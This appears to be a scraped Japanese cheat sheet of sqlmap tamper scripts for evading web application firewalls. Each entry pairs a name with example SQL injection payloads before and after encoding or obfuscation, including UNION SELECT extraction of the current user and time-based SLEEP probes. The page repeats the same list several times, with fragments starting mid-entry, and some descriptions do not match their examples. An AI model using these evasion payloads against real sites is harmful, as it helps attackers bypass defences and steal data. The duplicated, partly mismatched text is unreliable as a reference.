Sqlmapの一般的なスクリプトリストの迂回
5387 ワード
apostrophemask
SQL文のアポストロフィをUTF符号化します.Example:
* Input: AND '1'='1'
* Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87
apostrophenullencode
SQL文のアポストロフィをUnicode符号化します.Example:
* Input: AND '1'='1'
* Output: AND %00%271%00%27=%00%271%00%27
appendnullbyte
ペイロードの最後に符号化された空のバイト文字を追加します.Example:
* Input: AND 1=1
* Output: AND 1=1%00
Requirement:
* Microsoft Access
base64encode
攻撃に使用するペイロードをbase 64で暗号化します.Example:
* Input: 1' AND SLEEP(5)#
* Output: MScgQU5EIFNMRUVQKDUpIw==
between
より大きい番号を置換します.Example:
* Input: 'A > B'
* Output: 'A NOT BETWEEN 0 AND B'
bluecoat
スペースをランダムな空白文字に置き換え、likeを=に置き換えます.Example:
* Input: SELECT id FROM users where id = 1
* Output: SELECT%09id FROM users where id LIKE 1
Requirement:
* MySQL 5.1, SGOS
chardoubleencode
二重URLコード.Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
charencode
URLコード.Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
charunicodeencode
url符号化されていない文字をunicode符号化します.Example:
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
Requirement:
* ASP
* ASP.NET
equaltolike
=をlikeで置き換えます.Example:
* Input: SELECT * FROM users WHERE id=1
* Output: SELECT * FROM users WHERE id LIKE 1
space2dash
フィルタを省略=スペース文字を置換します.–ダッシュコメント、ランダム文字列、新しい行が続きます.Example:
* Input: '1 AND 9227=9227'
* Output: '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
greatest
より大きい番号をGREATEST関数で置き換えます.Example:
* Input: '1 AND A > B'
* Output: '1 AND GREATEST(A,B+1)=A' Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0
space2hash
スペースは、井戸番号、ランダム文字列、または改行に置き換えられます.Example:
* Input: '1 AND 9227=9227'
* Output: '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
halfversionedmorekeywords
SQLキーワードごとにコメントを追加します.Example:
* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
space2morehash
スペースは、井戸番号、改行、およびより多くのランダム文字列に置き換えられます.Example:
* Input: '1 AND 9227=9227'
* Output: '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
ifnull2ifisnull
IFNULLフィルタリングを迂回します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%A0id%0BFROM%0Cusers'
space2plus
スペースをプラス記号で置換します(ブロックされる可能性があります).Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT+id+FROM+users'
nonrecursivereplacement
二重クエリ文.Example:
* Input: '1 UNION SELECT 2--'
* Output: '1 UNIOUNIONN SELESELECTCT 2--'
space2randomblank
有効な空白記号の文字セットからスペースを選択して置換します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%0Did%0DFROM%0Ausers'
sp_password
追加sp_password’は、DBMSログの自動ぼかし処理のペイロードの末尾から.Example:
* Intput: '1 AND 9227=9227-- '
* Output: '1 AND 9227=9227-- sp_password'
Requierment:
* Not Oracle
randomcase
ランダム・大文字と小文字.Example:
* Input: 'INSERT'
* Output: 'INseRt'
unmagicquotes
広い文字はGPC addslashesを迂回します.Example:
* Input: "1' AND 1=1"
* Output: '1%bf%27-- '
randomcomments /*...*/でSQLキーワードを分割します.* Input: 'INSERT'
* Output: 'I/**/N/**/SERT'
halfversionedmorekeywords
キーワードにコメントを付ける.* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
この文書はhttp://www.chuhades.com/post/19590b_4cc51f
Example:
* Input: AND '1'='1'
* Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87
SQL文のアポストロフィをUnicode符号化します.
Example:
* Input: AND '1'='1'
* Output: AND %00%271%00%27=%00%271%00%27
appendnullbyte
ペイロードの最後に符号化された空のバイト文字を追加します.Example:
* Input: AND 1=1
* Output: AND 1=1%00
Requirement:
* Microsoft Access
base64encode
攻撃に使用するペイロードをbase 64で暗号化します.Example:
* Input: 1' AND SLEEP(5)#
* Output: MScgQU5EIFNMRUVQKDUpIw==
between
より大きい番号を置換します.Example:
* Input: 'A > B'
* Output: 'A NOT BETWEEN 0 AND B'
bluecoat
スペースをランダムな空白文字に置き換え、likeを=に置き換えます.Example:
* Input: SELECT id FROM users where id = 1
* Output: SELECT%09id FROM users where id LIKE 1
Requirement:
* MySQL 5.1, SGOS
chardoubleencode
二重URLコード.Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
charencode
URLコード.Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
charunicodeencode
url符号化されていない文字をunicode符号化します.Example:
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
Requirement:
* ASP
* ASP.NET
equaltolike
=をlikeで置き換えます.Example:
* Input: SELECT * FROM users WHERE id=1
* Output: SELECT * FROM users WHERE id LIKE 1
space2dash
フィルタを省略=スペース文字を置換します.–ダッシュコメント、ランダム文字列、新しい行が続きます.Example:
* Input: '1 AND 9227=9227'
* Output: '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
greatest
より大きい番号をGREATEST関数で置き換えます.Example:
* Input: '1 AND A > B'
* Output: '1 AND GREATEST(A,B+1)=A' Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0
space2hash
スペースは、井戸番号、ランダム文字列、または改行に置き換えられます.Example:
* Input: '1 AND 9227=9227'
* Output: '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
halfversionedmorekeywords
SQLキーワードごとにコメントを追加します.Example:
* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
space2morehash
スペースは、井戸番号、改行、およびより多くのランダム文字列に置き換えられます.Example:
* Input: '1 AND 9227=9227'
* Output: '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
ifnull2ifisnull
IFNULLフィルタリングを迂回します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%A0id%0BFROM%0Cusers'
space2plus
スペースをプラス記号で置換します(ブロックされる可能性があります).Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT+id+FROM+users'
nonrecursivereplacement
二重クエリ文.Example:
* Input: '1 UNION SELECT 2--'
* Output: '1 UNIOUNIONN SELESELECTCT 2--'
space2randomblank
有効な空白記号の文字セットからスペースを選択して置換します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%0Did%0DFROM%0Ausers'
sp_password
追加sp_password’は、DBMSログの自動ぼかし処理のペイロードの末尾から.Example:
* Intput: '1 AND 9227=9227-- '
* Output: '1 AND 9227=9227-- sp_password'
Requierment:
* Not Oracle
randomcase
ランダム・大文字と小文字.Example:
* Input: 'INSERT'
* Output: 'INseRt'
unmagicquotes
広い文字はGPC addslashesを迂回します.Example:
* Input: "1' AND 1=1"
* Output: '1%bf%27-- '
randomcomments /*...*/でSQLキーワードを分割します.* Input: 'INSERT'
* Output: 'I/**/N/**/SERT'
halfversionedmorekeywords
キーワードにコメントを付ける.* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
この文書はhttp://www.chuhades.com/post/19590b_4cc51f
Example:
* Input: AND 1=1
* Output: AND 1=1%00
Requirement:
* Microsoft Access
攻撃に使用するペイロードをbase 64で暗号化します.
Example:
* Input: 1' AND SLEEP(5)#
* Output: MScgQU5EIFNMRUVQKDUpIw==
between
より大きい番号を置換します.Example:
* Input: 'A > B'
* Output: 'A NOT BETWEEN 0 AND B'
bluecoat
スペースをランダムな空白文字に置き換え、likeを=に置き換えます.Example:
* Input: SELECT id FROM users where id = 1
* Output: SELECT%09id FROM users where id LIKE 1
Requirement:
* MySQL 5.1, SGOS
chardoubleencode
二重URLコード.Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
charencode
URLコード.Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
charunicodeencode
url符号化されていない文字をunicode符号化します.Example:
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
Requirement:
* ASP
* ASP.NET
equaltolike
=をlikeで置き換えます.Example:
* Input: SELECT * FROM users WHERE id=1
* Output: SELECT * FROM users WHERE id LIKE 1
space2dash
フィルタを省略=スペース文字を置換します.–ダッシュコメント、ランダム文字列、新しい行が続きます.Example:
* Input: '1 AND 9227=9227'
* Output: '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
greatest
より大きい番号をGREATEST関数で置き換えます.Example:
* Input: '1 AND A > B'
* Output: '1 AND GREATEST(A,B+1)=A' Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0
space2hash
スペースは、井戸番号、ランダム文字列、または改行に置き換えられます.Example:
* Input: '1 AND 9227=9227'
* Output: '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
halfversionedmorekeywords
SQLキーワードごとにコメントを追加します.Example:
* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
space2morehash
スペースは、井戸番号、改行、およびより多くのランダム文字列に置き換えられます.Example:
* Input: '1 AND 9227=9227'
* Output: '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
ifnull2ifisnull
IFNULLフィルタリングを迂回します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%A0id%0BFROM%0Cusers'
space2plus
スペースをプラス記号で置換します(ブロックされる可能性があります).Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT+id+FROM+users'
nonrecursivereplacement
二重クエリ文.Example:
* Input: '1 UNION SELECT 2--'
* Output: '1 UNIOUNIONN SELESELECTCT 2--'
space2randomblank
有効な空白記号の文字セットからスペースを選択して置換します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%0Did%0DFROM%0Ausers'
sp_password
追加sp_password’は、DBMSログの自動ぼかし処理のペイロードの末尾から.Example:
* Intput: '1 AND 9227=9227-- '
* Output: '1 AND 9227=9227-- sp_password'
Requierment:
* Not Oracle
randomcase
ランダム・大文字と小文字.Example:
* Input: 'INSERT'
* Output: 'INseRt'
unmagicquotes
広い文字はGPC addslashesを迂回します.Example:
* Input: "1' AND 1=1"
* Output: '1%bf%27-- '
randomcomments /*...*/でSQLキーワードを分割します.* Input: 'INSERT'
* Output: 'I/**/N/**/SERT'
halfversionedmorekeywords
キーワードにコメントを付ける.* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
この文書はhttp://www.chuhades.com/post/19590b_4cc51f
Example:
* Input: 'A > B'
* Output: 'A NOT BETWEEN 0 AND B'
スペースをランダムな空白文字に置き換え、likeを=に置き換えます.
Example:
* Input: SELECT id FROM users where id = 1
* Output: SELECT%09id FROM users where id LIKE 1
Requirement:
* MySQL 5.1, SGOS
chardoubleencode
二重URLコード.Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
charencode
URLコード.Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
charunicodeencode
url符号化されていない文字をunicode符号化します.Example:
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
Requirement:
* ASP
* ASP.NET
equaltolike
=をlikeで置き換えます.Example:
* Input: SELECT * FROM users WHERE id=1
* Output: SELECT * FROM users WHERE id LIKE 1
space2dash
フィルタを省略=スペース文字を置換します.–ダッシュコメント、ランダム文字列、新しい行が続きます.Example:
* Input: '1 AND 9227=9227'
* Output: '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
greatest
より大きい番号をGREATEST関数で置き換えます.Example:
* Input: '1 AND A > B'
* Output: '1 AND GREATEST(A,B+1)=A' Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0
space2hash
スペースは、井戸番号、ランダム文字列、または改行に置き換えられます.Example:
* Input: '1 AND 9227=9227'
* Output: '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
halfversionedmorekeywords
SQLキーワードごとにコメントを追加します.Example:
* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
space2morehash
スペースは、井戸番号、改行、およびより多くのランダム文字列に置き換えられます.Example:
* Input: '1 AND 9227=9227'
* Output: '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
ifnull2ifisnull
IFNULLフィルタリングを迂回します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%A0id%0BFROM%0Cusers'
space2plus
スペースをプラス記号で置換します(ブロックされる可能性があります).Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT+id+FROM+users'
nonrecursivereplacement
二重クエリ文.Example:
* Input: '1 UNION SELECT 2--'
* Output: '1 UNIOUNIONN SELESELECTCT 2--'
space2randomblank
有効な空白記号の文字セットからスペースを選択して置換します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%0Did%0DFROM%0Ausers'
sp_password
追加sp_password’は、DBMSログの自動ぼかし処理のペイロードの末尾から.Example:
* Intput: '1 AND 9227=9227-- '
* Output: '1 AND 9227=9227-- sp_password'
Requierment:
* Not Oracle
randomcase
ランダム・大文字と小文字.Example:
* Input: 'INSERT'
* Output: 'INseRt'
unmagicquotes
広い文字はGPC addslashesを迂回します.Example:
* Input: "1' AND 1=1"
* Output: '1%bf%27-- '
randomcomments /*...*/でSQLキーワードを分割します.* Input: 'INSERT'
* Output: 'I/**/N/**/SERT'
halfversionedmorekeywords
キーワードにコメントを付ける.* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
この文書はhttp://www.chuhades.com/post/19590b_4cc51f
Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
URLコード.
Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
charunicodeencode
url符号化されていない文字をunicode符号化します.Example:
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
Requirement:
* ASP
* ASP.NET
equaltolike
=をlikeで置き換えます.Example:
* Input: SELECT * FROM users WHERE id=1
* Output: SELECT * FROM users WHERE id LIKE 1
space2dash
フィルタを省略=スペース文字を置換します.–ダッシュコメント、ランダム文字列、新しい行が続きます.Example:
* Input: '1 AND 9227=9227'
* Output: '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
greatest
より大きい番号をGREATEST関数で置き換えます.Example:
* Input: '1 AND A > B'
* Output: '1 AND GREATEST(A,B+1)=A' Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0
space2hash
スペースは、井戸番号、ランダム文字列、または改行に置き換えられます.Example:
* Input: '1 AND 9227=9227'
* Output: '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
halfversionedmorekeywords
SQLキーワードごとにコメントを追加します.Example:
* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
space2morehash
スペースは、井戸番号、改行、およびより多くのランダム文字列に置き換えられます.Example:
* Input: '1 AND 9227=9227'
* Output: '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
ifnull2ifisnull
IFNULLフィルタリングを迂回します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%A0id%0BFROM%0Cusers'
space2plus
スペースをプラス記号で置換します(ブロックされる可能性があります).Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT+id+FROM+users'
nonrecursivereplacement
二重クエリ文.Example:
* Input: '1 UNION SELECT 2--'
* Output: '1 UNIOUNIONN SELESELECTCT 2--'
space2randomblank
有効な空白記号の文字セットからスペースを選択して置換します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%0Did%0DFROM%0Ausers'
sp_password
追加sp_password’は、DBMSログの自動ぼかし処理のペイロードの末尾から.Example:
* Intput: '1 AND 9227=9227-- '
* Output: '1 AND 9227=9227-- sp_password'
Requierment:
* Not Oracle
randomcase
ランダム・大文字と小文字.Example:
* Input: 'INSERT'
* Output: 'INseRt'
unmagicquotes
広い文字はGPC addslashesを迂回します.Example:
* Input: "1' AND 1=1"
* Output: '1%bf%27-- '
randomcomments /*...*/でSQLキーワードを分割します.* Input: 'INSERT'
* Output: 'I/**/N/**/SERT'
halfversionedmorekeywords
キーワードにコメントを付ける.* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
この文書はhttp://www.chuhades.com/post/19590b_4cc51f
Example:
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
Requirement:
* ASP
* ASP.NET
=をlikeで置き換えます.
Example:
* Input: SELECT * FROM users WHERE id=1
* Output: SELECT * FROM users WHERE id LIKE 1
space2dash
フィルタを省略=スペース文字を置換します.–ダッシュコメント、ランダム文字列、新しい行が続きます.Example:
* Input: '1 AND 9227=9227'
* Output: '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
greatest
より大きい番号をGREATEST関数で置き換えます.Example:
* Input: '1 AND A > B'
* Output: '1 AND GREATEST(A,B+1)=A' Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0
space2hash
スペースは、井戸番号、ランダム文字列、または改行に置き換えられます.Example:
* Input: '1 AND 9227=9227'
* Output: '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
halfversionedmorekeywords
SQLキーワードごとにコメントを追加します.Example:
* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
space2morehash
スペースは、井戸番号、改行、およびより多くのランダム文字列に置き換えられます.Example:
* Input: '1 AND 9227=9227'
* Output: '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
ifnull2ifisnull
IFNULLフィルタリングを迂回します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%A0id%0BFROM%0Cusers'
space2plus
スペースをプラス記号で置換します(ブロックされる可能性があります).Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT+id+FROM+users'
nonrecursivereplacement
二重クエリ文.Example:
* Input: '1 UNION SELECT 2--'
* Output: '1 UNIOUNIONN SELESELECTCT 2--'
space2randomblank
有効な空白記号の文字セットからスペースを選択して置換します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%0Did%0DFROM%0Ausers'
sp_password
追加sp_password’は、DBMSログの自動ぼかし処理のペイロードの末尾から.Example:
* Intput: '1 AND 9227=9227-- '
* Output: '1 AND 9227=9227-- sp_password'
Requierment:
* Not Oracle
randomcase
ランダム・大文字と小文字.Example:
* Input: 'INSERT'
* Output: 'INseRt'
unmagicquotes
広い文字はGPC addslashesを迂回します.Example:
* Input: "1' AND 1=1"
* Output: '1%bf%27-- '
randomcomments /*...*/でSQLキーワードを分割します.* Input: 'INSERT'
* Output: 'I/**/N/**/SERT'
halfversionedmorekeywords
キーワードにコメントを付ける.* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
この文書はhttp://www.chuhades.com/post/19590b_4cc51f
Example:
* Input: '1 AND 9227=9227'
* Output: '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
より大きい番号をGREATEST関数で置き換えます.
Example:
* Input: '1 AND A > B'
* Output: '1 AND GREATEST(A,B+1)=A' Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0
space2hash
スペースは、井戸番号、ランダム文字列、または改行に置き換えられます.Example:
* Input: '1 AND 9227=9227'
* Output: '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
halfversionedmorekeywords
SQLキーワードごとにコメントを追加します.Example:
* Input: "value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa"
* Output: "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
space2morehash
スペースは、井戸番号、改行、およびより多くのランダム文字列に置き換えられます.Example:
* Input: '1 AND 9227=9227'
* Output: '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
ifnull2ifisnull
IFNULLフィルタリングを迂回します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%A0id%0BFROM%0Cusers'
space2plus
スペースをプラス記号で置換します(ブロックされる可能性があります).Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT+id+FROM+users'
nonrecursivereplacement
二重クエリ文.Example:
* Input: '1 UNION SELECT 2--'
* Output: '1 UNIOUNIONN SELESELECTCT 2--'
space2randomblank
有効な空白記号の文字セットからスペースを選択して置換します.Example:
* Input: 'SELECT id FROM users'
* Output: 'SELECT%0Did%0DFROM%0Ausers'
sp_password
追加sp_password’は、DBMSログの自動ぼかし処理のペイロードの末尾から.Example:
* Intput: '1 AND 9227=9227-- '
* Output: '1 AND 9227=9227-- sp_password'
Requierment:
* Not Oracle
randomcase
ランダム・大文字と小文字.Example:
* Input: 'INSERT'
* Output: 'INseRt'
unmagicquotes
広い文字はGPC addslashesを迂回します.Example:
* Input: "1' AND 1=1"
* Output: '1%bf%27-- '
randomcomments /*...*/でSQLキーワードを分割します.* Input: 'INSERT'
* Output: 'I/**/N/**/SERT'
halfversionedmorekeywords
